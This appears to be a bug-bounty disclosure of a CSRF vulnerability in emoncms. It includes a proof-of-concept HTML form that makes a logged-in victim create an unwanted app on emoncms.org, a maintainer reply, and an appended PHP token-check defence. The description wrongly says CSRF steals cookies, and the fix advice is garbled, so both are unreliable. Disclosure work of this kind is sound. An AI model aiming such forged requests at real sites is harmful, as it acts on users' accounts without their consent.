Cross-Site Request Forgery (CSRF) in emoncms/emoncms
Reported on
Jul 15th 2021
✍️ Description
In a CSRF attack, if your users go to an attacker's website and click the malicious link, then they are able to steal users' cookies, submit unwanted data, ...
🕵️ Proof of Concept
1. You log in to your account.
2. You make a file containing the following HTML.
3. Open the HTML (as victim site).
4. The client, without any more interaction, creates an unwanted App named My Energy3.
// PoC.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://emoncms.org/app/add">
<input type="hidden" name="name" value="My Energy3" />
<input type="hidden" name="app" value="myenergy" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
The attacker can create any App in the victim user's account.
Fix
You can set cookies on a custom header. This is the fastest way that you can protect your users.
Occurrences
Great, thanks amammad. I will take a look at this and your other similar CSRF vulnerability and get back to you shortly.
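One way to apply the custom-header idea from the Fix section to a state-changing route such as /app/add, as an added example that is not part of the report and not emoncms code. The function names, the `csrf_token` session key and the `x-csrf-token` header name are assumptions made for illustration, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not emoncms code: issue one random token per session.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request (such as /app/add) may proceed.
// $headers uses lower-case names; 'x-csrf-token' is an assumed header name.
function csrf_request_allowed(string $method, array $headers, array $session): bool
{
    // State changes must not be reachable by GET: a plain cross-site form
    // or link can send GET, which is what the PoC form above does.
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $headers['x-csrf-token'] ?? '';
    if ($expected === '' || $supplied === '') {
        return false;
    }
    // A cross-site HTML form cannot set custom request headers, and the
    // attacker's page cannot read the token; compare in constant time.
    return hash_equals($expected, $supplied);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_issue_token($session);

$samples = [
    'PoC form (GET, no header)' => ['GET', []],
    'POST without token'        => ['POST', []],
    'POST with wrong token'     => ['POST', ['x-csrf-token' => str_repeat('0', 64)]],
    'POST with session token'   => ['POST', ['x-csrf-token' => $token]],
];

foreach ($samples as $label => [$method, $headers]) {
    $verdict = csrf_request_allowed($method, $headers, $session) ? 'allow' : 'reject';
    printf("%-28s %s\n", $label, $verdict);
}
```

Only the last sample is allowed; the first three, including the request shape used by the PoC form, are rejected.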